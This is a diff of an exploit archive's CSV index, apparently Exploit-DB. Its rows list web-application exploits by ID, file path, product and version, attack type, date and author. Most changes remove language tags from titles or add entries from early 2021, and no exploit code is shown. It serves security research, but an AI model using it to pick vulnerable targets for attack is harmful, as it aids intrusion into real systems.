 1004,exploits/cgi/webapps/1004.php,"WebAPP 0.9.9.2.1 - Remote Command Execution (2)",2005-05-20,Nikyt0x,webapps,cgi,
 1005,exploits/cgi/webapps/1005.pl,"WebAPP 0.9.9.2.1 - Remote Command Execution (1)",2005-05-20,Alpha_Programmer,webapps,cgi,
 1006,exploits/php/webapps/1006.pl,"Woltlab Burning Board 2.3.1 - 'register.php' SQL Injection",2005-05-20,deluxe89,webapps,php,
-1010,exploits/asp/webapps/1010.pl,"Maxwebportal 1.36 - 'Password.asp' Change Password (3) (Perl)",2005-05-26,Alpha_Programmer,webapps,asp,
-1011,exploits/asp/webapps/1011.php,"Maxwebportal 1.36 - 'Password.asp' Change Password (2) (PHP)",2005-05-26,mh_p0rtal,webapps,asp,
+1010,exploits/asp/webapps/1010.pl,"Maxwebportal 1.36 - 'Password.asp' Change Password (3)",2005-05-26,Alpha_Programmer,webapps,asp,
+1011,exploits/asp/webapps/1011.php,"Maxwebportal 1.36 - 'Password.asp' Change Password (2)",2005-05-26,mh_p0rtal,webapps,asp,
 1012,exploits/asp/webapps/1012.txt,"Maxwebportal 1.36 - 'Password.asp' Change Password (1) (HTML)",2005-05-26,"Soroush Dalili",webapps,asp,
 1013,exploits/php/webapps/1013.pl,"Invision Power Board 2.0.3 - 'login.php' SQL Injection",2005-05-26,"Petey Beege",webapps,php,
 1014,exploits/php/webapps/1014.txt,"Invision Power Board 2.0.3 - 'login.php' SQL Injection (Tutorial)",2005-05-27,"Danica Jones",webapps,php,
 1015,exploits/asp/webapps/1015.txt,"Hosting Controller 0.6.1 - User Registration (3)",2005-05-27,"Soroush Dalili",webapps,asp,
-1016,exploits/php/webapps/1016.pl,"phpStat 1.5 - 'setup.php' Authentication Bypass (Perl)",2005-05-30,Alpha_Programmer,webapps,php,
+1016,exploits/php/webapps/1016.pl,"phpStat 1.5 - 'setup.php' Authentication Bypass",2005-05-30,Alpha_Programmer,webapps,php,
 1017,exploits/php/webapps/1017.php,"phpStat 1.5 - 'setup.php' Authentication Bypass (PHP) (1)",2005-05-30,mh_p0rtal,webapps,php,
 1018,exploits/php/webapps/1018.php,"phpStat 1.5 - 'setup.php' Authentication Bypass (PHP) (2)",2005-05-30,Nikyt0x,webapps,php,
 1020,exploits/php/webapps/1020.c,"ZeroBoard 4.1 - 'preg_replace' Remote Nobody Shell",2005-05-31,n0gada,webapps,php,
@@ -18556,7 +18558,7 @@ id,file,description,date,author,type,platform,port
 1356,exploits/php/webapps/1356.php,"DoceboLms 2.0.4 - 'connector.php' Arbitrary File Upload",2005-12-04,rgod,webapps,php,
 1358,exploits/php/webapps/1358.php,"SimpleBBS 1.1 - Remote Command Execution",2005-12-06,rgod,webapps,php,
 1359,exploits/php/webapps/1359.php,"SugarSuite Open Source 4.0beta - Remote Code Execution (1)",2005-12-07,rgod,webapps,php,
-1361,exploits/php/webapps/1361.c,"SimpleBBS 1.1 - Remote Command Execution (C)",2005-12-07,unitedasia,webapps,php,
+1361,exploits/php/webapps/1361.c,"SimpleBBS 1.1 - Remote Command Execution",2005-12-07,unitedasia,webapps,php,
 1363,exploits/php/webapps/1363.php,"Website Baker 2.6.0 - Authentication Bypass / Remote Code Execution",2005-12-08,rgod,webapps,php,
 1364,exploits/php/webapps/1364.c,"SugarSuite Open Source 4.0beta - Remote Code Execution (2)",2005-12-08,pointslash,webapps,php,
 1367,exploits/php/webapps/1367.php,"Flatnuke 2.5.6 - Privilege Escalation / Remote Command Execution",2005-12-10,rgod,webapps,php,
@@ -18873,8 +18875,8 @@ id,file,description,date,author,type,platform,port
 1933,exploits/php/webapps/1933.txt,"BandSite CMS 1.1.1 - 'ROOT_PATH' Remote File Inclusion",2006-06-20,Kw3[R]Ln,webapps,php,
 1934,exploits/php/webapps/1934.txt,"dotProject 2.0.3 - 'baseDir' Remote File Inclusion",2006-06-20,h4ntu,webapps,php,
 1936,exploits/php/webapps/1936.txt,"SmartSite CMS 1.0 - 'root' Remote File Inclusion",2006-06-20,Archit3ct,webapps,php,
-1938,exploits/php/webapps/1938.pl,"DataLife Engine 4.1 - SQL Injection (Perl)",2006-06-21,RusH,webapps,php,
-1939,exploits/php/webapps/1939.php,"DataLife Engine 4.1 - SQL Injection (PHP)",2006-06-21,RusH,webapps,php,
+1938,exploits/php/webapps/1938.pl,"DataLife Engine 4.1 - SQL Injection",2006-06-21,RusH,webapps,php,
+1939,exploits/php/webapps/1939.php,"DataLife Engine 4.1 - SQL Injection",2006-06-21,RusH,webapps,php,
 1941,exploits/php/webapps/1941.php,"Mambo 4.6rc1 - Weblinks Blind SQL Injection (2)",2006-06-22,rgod,webapps,php,
 1942,exploits/php/webapps/1942.txt,"ralf image Gallery 0.7.4 - Multiple Vulnerabilities",2006-06-22,Aesthetico,webapps,php,
 1943,exploits/php/webapps/1943.txt,"Harpia CMS 1.0.5 - Remote File Inclusion",2006-06-22,Kw3[R]Ln,webapps,php,
@@ -19329,7 +19331,7 @@ id,file,description,date,author,type,platform,port
 2551,exploits/php/webapps/2551.txt,"phpBB ACP User Registration Mod 1.0 - Remote File Inclusion",2006-10-13,bd0rk,webapps,php,
 2552,exploits/php/webapps/2552.pl,"phpBB Security 1.0.1 - 'PHP_security.php' Remote File Inclusion",2006-10-13,"Nima Salehi",webapps,php,
 2553,exploits/php/webapps/2553.txt,"YaBBSM 3.0.0 - 'Offline.php' Remote File Inclusion",2006-10-13,SilenZ,webapps,php,
-2554,exploits/php/webapps/2554.php,"cPanel 10.8.x - 'cpwrap' via MySQLAdmin Privilege Escalation (PHP)",2006-10-13,"Nima Salehi",webapps,php,
+2554,exploits/php/webapps/2554.php,"cPanel 10.8.x - 'cpwrap' via MySQLAdmin Privilege Escalation",2006-10-13,"Nima Salehi",webapps,php,
 2555,exploits/php/webapps/2555.txt,"CentiPaid 1.4.2 - 'centipaid_class.php' Remote File Inclusion",2006-10-14,Kw3[R]Ln,webapps,php,
 2556,exploits/php/webapps/2556.txt,"E-Uploader Pro 1.0 - Image Upload / Code Execution",2006-10-14,Kacper,webapps,php,
 2557,exploits/php/webapps/2557.txt,"IncCMS Core 1.0.0 - 'settings.php' Remote File Inclusion",2006-10-14,Kacper,webapps,php,
@@ -21732,8 +21734,8 @@ id,file,description,date,author,type,platform,port
 6049,exploits/php/webapps/6049.txt,"Maian Gallery 2.0 - Insecure Cookie Handling",2008-07-12,Saime,webapps,php,
 6050,exploits/php/webapps/6050.txt,"Maian Greetings 2.1 - Insecure Cookie Handling",2008-07-12,Saime,webapps,php,
 6051,exploits/php/webapps/6051.txt,"Maian Music 1.0 - Insecure Cookie Handling",2008-07-12,Saime,webapps,php,
-6053,exploits/php/webapps/6053.php,"Fuzzylime CMS 3.01 - 'poll' Remote Code Execution (PHP)",2008-07-12,"Inphex & real",webapps,php,
-6054,exploits/php/webapps/6054.pl,"Fuzzylime CMS 3.01 - 'poll' Remote Code Execution (Perl)",2008-07-12,"Inphex & real",webapps,php,
+6053,exploits/php/webapps/6053.php,"Fuzzylime CMS 3.01 - 'poll' Remote Code Execution",2008-07-12,"Inphex & real",webapps,php,
+6054,exploits/php/webapps/6054.pl,"Fuzzylime CMS 3.01 - 'poll' Remote Code Execution",2008-07-12,"Inphex & real",webapps,php,
 6055,exploits/php/webapps/6055.pl,"Joomla! Component n-forms 1.01 - Blind SQL Injection",2008-07-12,"The Moorish",webapps,php,
 6056,exploits/php/webapps/6056.txt,"WebCMS Portal Edition - 'id' SQL Injection",2008-07-12,Mr.SQL,webapps,php,
 6057,exploits/php/webapps/6057.txt,"jsite 1.0 oe - SQL Injection / Local File Inclusion",2008-07-12,S.W.A.T.,webapps,php,
@@ -23480,7 +23482,7 @@ id,file,description,date,author,type,platform,port
 8555,exploits/php/webapps/8555.txt,"ABC Advertise 1.0 - Admin Password Disclosure",2009-04-27,SirGod,webapps,php,
 8557,exploits/php/webapps/8557.html,"VisionLms 1.0 - 'changePW.php' Remote Password Change",2009-04-28,Mr.tro0oqy,webapps,php,
 8558,exploits/php/webapps/8558.txt,"MIM: InfiniX 1.2.003 - Multiple SQL Injections",2009-04-28,YEnH4ckEr,webapps,php,
-8559,exploits/php/webapps/8559.c,"webSPELL 4.2.0d (Linux) - Local File Disclosure (C)",2009-04-28,StAkeR,webapps,php,
+8559,exploits/php/webapps/8559.c,"webSPELL 4.2.0d (Linux) - Local File Disclosure",2009-04-28,StAkeR,webapps,php,
 8563,exploits/php/webapps/8563.txt,"eLitius 1.0 - 'banner-details.php?id' SQL Injection",2009-04-29,snakespc,webapps,php,
 8565,exploits/php/webapps/8565.txt,"ProjectCMS 1.0b - 'index.php?sn' SQL Injection",2009-04-29,YEnH4ckEr,webapps,php,
 8566,exploits/php/webapps/8566.txt,"S-CMS 1.1 Stable - 'page' Local File Inclusion",2009-04-29,ZoRLu,webapps,php,
@@ -36086,7 +36088,7 @@ id,file,description,date,author,type,platform,port
 34518,exploits/jsp/webapps/34518.txt,"ManageEngine Desktop Central - Arbitrary File Upload / Remote Code Execution",2014-09-01,"Pedro Ribeiro",webapps,jsp,
 34519,exploits/jsp/webapps/34519.txt,"ManageEngine EventLog Analyzer - Multiple Vulnerabilities (1)",2014-09-01,"Hans-Martin Muench",webapps,jsp,8400
 34524,exploits/php/webapps/34524.txt,"WordPress Plugin Huge-IT Image Gallery 1.0.1 - (Authenticated) SQL Injection",2014-09-02,"Claudio Viviani",webapps,php,80
-34525,exploits/multiple/webapps/34525.txt,"Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting (Python)",2014-09-02,"Dolev Farhi",webapps,multiple,
+34525,exploits/multiple/webapps/34525.txt,"Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting",2014-09-02,"Dolev Farhi",webapps,multiple,
 34637,exploits/php/webapps/34637.txt,"Joomla! Component com_formmaker 3.4 - SQL Injection",2014-09-12,"Claudio Viviani",webapps,php,
 34684,exploits/php/webapps/34684.pl,"Joomla! Component com_spain - 'nv' SQL Injection",2010-09-20,FL0RiX,webapps,php,
 34531,exploits/php/webapps/34531.txt,"BlastChat Client 3.3 - Cross-Site Scripting",2010-08-25,"Aung Khant",webapps,php,
@@ -36204,7 +36206,7 @@ id,file,description,date,author,type,platform,port
 34678,exploits/php/webapps/34678.txt,"WebStatCaffe - '/stat/pageviewerschart.php?date' Cross-Site Scripting",2009-08-29,Moudi,webapps,php,
 34679,exploits/php/webapps/34679.txt,"WebStatCaffe - '/stat/referer.php?date' Cross-Site Scripting",2009-08-29,Moudi,webapps,php,
 34680,exploits/hardware/webapps/34680.txt,"ZTE ZXDSL-931VII - Configuration Dump",2014-09-16,"L0ukanik0-s S0kniaku0l",webapps,hardware,
-34681,exploits/php/webapps/34681.txt,"WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload (Python)",2014-09-16,"Claudio Viviani",webapps,php,
+34681,exploits/php/webapps/34681.txt,"WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload",2014-09-16,"Claudio Viviani",webapps,php,
 34682,exploits/ios/webapps/34682.txt,"USB&WiFi Flash Drive 1.3 iOS - Code Execution",2014-09-16,Vulnerability-Lab,webapps,ios,8080
 34687,exploits/asp/webapps/34687.txt,"Smart ASP Survey - 'catid' SQL Injection",2009-08-27,Moudi,webapps,asp,
 34688,exploits/php/webapps/34688.txt,"Basilic 1.5.13 - 'index.php' Cross-Site Scripting",2009-07-27,PLATEN,webapps,php,
@@ -39611,13 +39613,13 @@ id,file,description,date,author,type,platform,port
 43882,exploits/asp/webapps/43882.rb,"Kaseya Virtual System Administrator (VSA) 7.0 < 9.1 - (Authenticated) Arbitrary File Upload",2015-09-28,"Pedro Ribeiro",webapps,asp,
 40961,exploits/multiple/webapps/40961.py,"Apache mod_session_crypto - Padding Oracle",2016-12-23,"RedTeam Pentesting GmbH",webapps,multiple,
 40966,exploits/php/webapps/40966.txt,"Joomla! Component Blog Calendar - SQL Injection",2016-12-26,X-Cisadane,webapps,php,
-40968,exploits/php/webapps/40968.sh,"PHPMailer < 5.2.18 - Remote Code Execution (Bash)",2016-12-26,"Dawid Golunski",webapps,php,
-40970,exploits/php/webapps/40970.php,"PHPMailer < 5.2.18 - Remote Code Execution (PHP)",2016-12-25,"Dawid Golunski",webapps,php,
+40968,exploits/php/webapps/40968.sh,"PHPMailer < 5.2.18 - Remote Code Execution",2016-12-26,"Dawid Golunski",webapps,php,
+40970,exploits/php/webapps/40970.php,"PHPMailer < 5.2.18 - Remote Code Execution",2016-12-25,"Dawid Golunski",webapps,php,
 40969,exploits/php/webapps/40969.pl,"PHPMailer < 5.2.20 - Remote Code Execution",2016-12-27,"Dawid Golunski",webapps,php,
 40971,exploits/php/webapps/40971.txt,"WordPress Plugin Simply Poll 1.4.1 - SQL Injection",2016-12-28,"TAD GROUP",webapps,php,
 40972,exploits/php/webapps/40972.php,"SwiftMailer < 5.4.5-DEV - Remote Code Execution",2016-12-28,"Dawid Golunski",webapps,php,
 40973,exploits/php/webapps/40973.txt,"Joomla! Component aWeb Cart Watching System for Virtuemart 2.6.0 - SQL Injection",2016-12-28,qemm,webapps,php,
-40974,exploits/php/webapps/40974.py,"PHPMailer < 5.2.18 - Remote Code Execution (Python)",2016-12-29,anarc0der,webapps,php,
+40974,exploits/php/webapps/40974.py,"PHPMailer < 5.2.18 - Remote Code Execution",2016-12-29,anarc0der,webapps,php,
 40976,exploits/php/webapps/40976.txt,"WordPress Plugin Slider Templatic Tevolution < 2.3.6 - Arbitrary File Upload",2016-12-29,r3m1ck,webapps,php,
 40977,exploits/hardware/webapps/40977.txt,"Dell SonicWALL Global Management System GMS 8.1 - Blind SQL Injection",2016-12-29,LiquidWorm,webapps,hardware,
 40978,exploits/hardware/webapps/40978.txt,"Dell SonicWALL Secure Mobile Access SMA 8.1 - Cross-Site Scripting / Cross-Site Request Forgery",2016-12-29,LiquidWorm,webapps,hardware,
@@ -39780,7 +39782,7 @@ id,file,description,date,author,type,platform,port
 41208,exploits/hardware/webapps/41208.txt,"Netman 204 - Backdoor Account / Password Reset",2017-01-31,"Simon Gurney",webapps,hardware,
 41209,exploits/php/webapps/41209.txt,"Joomla! Component JTAG Calendar 6.2.4 - 'search' SQL Injection",2017-01-28,"Persian Hack Team",webapps,php,
 41210,exploits/php/webapps/41210.txt,"LogoStore - 'query' SQL Injection",2017-02-01,"Kaan KAMIS",webapps,php,
-41223,exploits/linux/webapps/41223.py,"WordPress Core 4.7.0/4.7.1 - Content Injection (Python)",2017-02-02,leonjza,webapps,linux,
+41223,exploits/linux/webapps/41223.py,"WordPress Core 4.7.0/4.7.1 - Content Injection",2017-02-02,leonjza,webapps,linux,
 41224,exploits/linux/webapps/41224.rb,"WordPress Core 4.7.0/4.7.1 - Content Injection (Ruby)",2017-02-02,"Harsh Jaiswal",webapps,linux,
 41231,exploits/php/webapps/41231.txt,"Itech Travel Portal Script 9.35 - SQL Injection",2017-02-02,"Ihsan Sencan",webapps,php,
 41225,exploits/php/webapps/41225.txt,"Property Listing Script - 'propid' Blind SQL Injection",2017-02-02,"Kaan KAMIS",webapps,php,
@@ -42518,7 +42520,7 @@ id,file,description,date,author,type,platform,port
 47125,exploits/linux/webapps/47125.txt,"CentOS Control Web Panel 0.9.8.838 - User Enumeration",2019-07-16,"Pongtorn Angsuchotmetee_ Nissana Sirijirakal_ Narin Boonwasanarak",webapps,linux,
 47132,exploits/linux/webapps/47132.txt,"Oracle Siebel CRM 19.0 - Persistent Cross-Site Scripting",2019-07-17,"Sarath Nair",webapps,linux,
 47136,exploits/linux/webapps/47136.txt,"WordPress Plugin OneSignal 1.17.5 - 'subdomain' Persistent Cross-Site Scripting",2019-07-18,LiquidWorm,webapps,linux,
-47138,exploits/linux/webapps/47138.py,"fuelCMS 1.4.1 - Remote Code Execution",2019-07-19,0xd0ff9,webapps,linux,
+47138,exploits/linux/webapps/47138.py,"fuel CMS 1.4.1 - Remote Code Execution (1)",2019-07-19,0xd0ff9,webapps,linux,
 47139,exploits/linux/webapps/47139.txt,"Web Ofisi E-Ticaret 3 - 'a' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux,
 47140,exploits/linux/webapps/47140.txt,"Web Ofisi Platinum E-Ticaret 5 - 'q' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux,
 47141,exploits/linux/webapps/47141.txt,"Web Ofisi Emlak 2 - 'ara' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux,
@@ -43183,7 +43185,7 @@ id,file,description,date,author,type,platform,port
 48509,exploits/php/webapps/48509.txt,"WordPress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)",2020-05-25,SunCSR,webapps,php,
 48511,exploits/php/webapps/48511.txt,"Victor CMS 1.0 - 'add_user' Persistent Cross-Site Scripting",2020-05-25,"Nitya Nand",webapps,php,
 48512,exploits/php/webapps/48512.txt,"Online Discussion Forum Site 1.0 - Remote Code Execution",2020-05-25,Enesdex,webapps,php,
-48515,exploits/php/webapps/48515.py,"OpenEMR 5.0.1 - Remote Code Execution",2020-05-26,"Musyoka Ian",webapps,php,
+48515,exploits/php/webapps/48515.py,"OpenEMR 5.0.1 - Remote Code Execution (1)",2020-05-26,"Musyoka Ian",webapps,php,
 48516,exploits/php/webapps/48516.txt,"Open-AudIT 3.3.0 - Reflective Cross-Site Scripting (Authenticated)",2020-05-26,"Kamaljeet Kumar",webapps,php,
 48518,exploits/php/webapps/48518.txt,"Joomla! Plugin XCloner Backup 3.5.3 - Local File Inclusion (Authenticated)",2020-05-26,"Mehmet Kelepçe",webapps,php,
 48519,exploits/linux/webapps/48519.py,"Pi-hole 4.4.0 - Remote Code Execution (Authenticated)",2020-05-26,Photubias,webapps,linux,
@@ -43317,7 +43319,6 @@ id,file,description,date,author,type,platform,port
 48714,exploits/php/webapps/48714.txt,"pfSense 2.4.4-p3 - Cross-Site Request Forgery",2020-07-26,ghost_fh,webapps,php,
 48715,exploits/php/webapps/48715.txt,"Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting",2020-07-26,"Peter Blue",webapps,php,
 48716,exploits/ruby/webapps/48716.rb,"Rails 5.0.1 - Remote Code Execution",2020-07-26,"Lucas Amorim",webapps,ruby,
-49294,exploits/php/webapps/49294.txt,"Wordpress Plugin Contact Form 7 5.3.1 - Unrestricted File Upload",2020-12-21,"Ramón Vila Ferreres",webapps,php,
 48720,exploits/php/webapps/48720.py,"eGroupWare 1.14 - 'spellchecker.php' Remote Command Execution",2020-07-27,"Berk KIRAS",webapps,php,
 48722,exploits/hardware/webapps/48722.txt,"Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion",2020-07-28,0xmmnbassel,webapps,hardware,
 48723,exploits/hardware/webapps/48723.sh,"Cisco Adaptive Security Appliance Software 9.7 - Unauthenticated Arbitrary File Deletion",2020-07-29,0xmmnbassel,webapps,hardware,
@@ -43405,6 +43406,7 @@ id,file,description,date,author,type,platform,port
 49113,exploits/multiple/webapps/49113.py,"Acronis Cyber Backup 12.5 Build 16341 - Unauthenticated SSRF",2020-11-27,"Julien Ahrens",webapps,multiple,
 49114,exploits/php/webapps/49114.txt,"Moodle 3.8 - Unrestricted File Upload",2020-11-27,"Sirwan Veisi",webapps,php,
 49115,exploits/php/webapps/49115.txt,"Wordpress Theme Accesspress Social Icons 1.7.9 - SQL injection (Authenticated)",2020-11-27,SunCSR,webapps,php,
+49500,exploits/php/webapps/49500.txt,"MyBB Delete Account Plugin 1.4 - Cross-Site Scripting",2021-02-01,0xB9,webapps,php,
 49117,exploits/php/webapps/49117.txt,"House Rental 1.0 - 'keywords' SQL Injection",2020-11-27,boku,webapps,php,
 49121,exploits/php/webapps/49121.txt,"ElkarBackup 1.3.3 - 'Policy[name]' and 'Policy[Description]' Stored Cross-site Scripting",2020-11-27,"Vyshnav nk",webapps,php,
 49122,exploits/php/webapps/49122.txt,"Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated)",2020-11-27,Ex.Mi,webapps,php,
@@ -43669,3 +43671,36 @@ id,file,description,date,author,type,platform,port
 49470,exploits/php/webapps/49470.txt,"CASAP Automated Enrollment System 1.0 - 'route' Stored XSS",2021-01-25,"Richard Jones",webapps,php,
 49471,exploits/php/webapps/49471.txt,"Library System 1.0 - 'category' SQL Injection",2021-01-25,"Aitor Herrero",webapps,php,
 49474,exploits/php/webapps/49474.rb,"Klog Server 2.4.1 - Unauthenticated Command Injection (Metasploit)",2021-01-25,"Metin Yunus Kandemir",webapps,php,
+49475,exploits/php/webapps/49475.txt,"Cemetry Mapping and Information System 1.0 - 'user_email' Sql Injection (Authentication Bypass)",2021-01-26,"Marco Catalano",webapps,php,
+49476,exploits/php/webapps/49476.txt,"Simple College Website 1.0 - 'name' Sql Injection (Authentication Bypass)",2021-01-26,"Marco Catalano",webapps,php,
+49477,exploits/php/webapps/49477.txt,"Simple College Website 1.0 - 'full' Stored Cross Site Scripting",2021-01-26,"Marco Catalano",webapps,php,
+49478,exploits/hardware/webapps/49478.txt,"Tenda AC5 AC1200 Wireless - 'WiFi Name & Password' Stored Cross Site Scripting",2021-01-26,"Chiragh Arora",webapps,hardware,
+49479,exploits/java/webapps/49479.py,"Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)",2021-01-26,CHackA0101,webapps,java,
+49483,exploits/multiple/webapps/49483.txt,"Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated)",2021-01-27,SunCSR,webapps,multiple,
+49481,exploits/ruby/webapps/49481.txt,"STVS ProVision 5.9.10 - File Disclosure (Authenticated)",2021-01-27,LiquidWorm,webapps,ruby,
+49482,exploits/ruby/webapps/49482.html,"STVS ProVision 5.9.10 - Cross-Site Request Forgery (Add Admin)",2021-01-27,LiquidWorm,webapps,ruby,
+49484,exploits/php/webapps/49484.txt,"EgavilanMedia PHPCRUD 1.0 - 'Full Name' Stored Cross Site Scripting",2021-01-28,"Mahendra Purbia",webapps,php,
+49485,exploits/php/webapps/49485.rb,"CMSUno 1.6.2 - 'lang/user' Remote Code Execution (Authenticated)",2021-01-28,"Alexandre ZANNI",webapps,php,
+49486,exploits/php/webapps/49486.rb,"OpenEMR 5.0.1 - Remote Code Execution (Authenticated) (2)",2021-01-28,"Alexandre ZANNI",webapps,php,
+49487,exploits/php/webapps/49487.rb,"Fuel CMS 1.4.1 - Remote Code Execution (2)",2021-01-28,"Alexandre ZANNI",webapps,php,
+49488,exploits/aspx/webapps/49488.py,"Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated)",2021-01-28,"Alexandre ZANNI",webapps,aspx,
+49490,exploits/php/webapps/49490.txt,"WordPress Plugin SuperForms 4.9 - Arbitrary File Upload to Remote Code Execution",2021-01-28,ABDO10,webapps,php,
+49492,exploits/php/webapps/49492.txt,"BloofoxCMS 0.5.2.1 - 'text' Stored Cross Site Scripting",2021-01-29,LiPeiYi,webapps,php,
+49493,exploits/php/webapps/49493.txt,"Online Grading System 1.0 - 'uname' SQL Injection",2021-01-29,"Ruchi Tiwari",webapps,php,
+49494,exploits/php/webapps/49494.py,"Quick.CMS 6.7 - Remote Code Execution (Authenticated)",2021-01-29,mari0x00,webapps,php,
+49495,exploits/python/webapps/49495.py,"Home Assistant Community Store (HACS) 1.10.0 - Path Traversal to Account Takeover",2021-01-29,Lyghtnox,webapps,python,
+49496,exploits/php/webapps/49496.txt,"MyBB Hide Thread Content Plugin 1.0 - Information Disclosure",2021-01-29,0xB9,webapps,php,
+49497,exploits/php/webapps/49497.txt,"Simple Public Chat Room 1.0 - Authentication Bypass SQLi",2021-01-29,"Richard Jones",webapps,php,
+49498,exploits/php/webapps/49498.txt,"Simple Public Chat Room 1.0 - 'msg' Stored Cross-Site Scripting",2021-01-29,"Richard Jones",webapps,php,
+49499,exploits/hardware/webapps/49499.py,"SonicWall SSL-VPN 8.0.0.0 - 'shellshock/visualdoor' Remote Code Execution (Unauthenticated)",2021-01-29,"Darren Martyn",webapps,hardware,
+49501,exploits/php/webapps/49501.txt,"Zoo Management System 1.0 - 'anid' SQL Injection",2021-02-01,"Zeyad Azima",webapps,php,
+49502,exploits/php/webapps/49502.txt,"User Management System 1.0 - 'uid' SQL Injection",2021-02-01,"Zeyad Azima",webapps,php,
+49503,exploits/php/webapps/49503.txt,"Park Ticketing Management System 1.0 - 'viewid' SQL Injection",2021-02-01,"Zeyad Azima",webapps,php,
+49504,exploits/php/webapps/49504.txt,"MyBB Trending Widget Plugin 1.2 - Cross-Site Scripting",2021-02-01,0xB9,webapps,php,
+49505,exploits/php/webapps/49505.txt,"MyBB Thread Redirect Plugin 0.2.1 - Cross-Site Scripting",2021-02-01,0xB9,webapps,php,
+49507,exploits/php/webapps/49507.html,"bloofoxCMS 0.5.2.1 - CSRF (Add user)",2021-02-01,LiPeiYi,webapps,php,
+49508,exploits/aspx/webapps/49508.txt,"H8 SSRMS - 'id' IDOR",2021-02-01,"Mohammed Farhan",webapps,aspx,
+49509,exploits/php/webapps/49509.txt,"Vehicle Parking Tracker System 1.0 - 'Owner Name'  Stored Cross-Site Scripting",2021-02-01,"Anmol K Sachan",webapps,php,
+49510,exploits/php/webapps/49510.py,"Roundcube Webmail 1.2 - File Disclosure",2021-02-01,stonepresto,webapps,php,
+49511,exploits/php/webapps/49511.py,"Klog Server 2.4.1 - Command Injection (Authenticated)",2021-02-01,"Metin Yunus Kandemir",webapps,php,
+49512,exploits/php/webapps/49512.py,"WordPress 5.0.0 - Image Remote Code Execution",2021-02-01,"OUSSAMA RAHALI",webapps,php,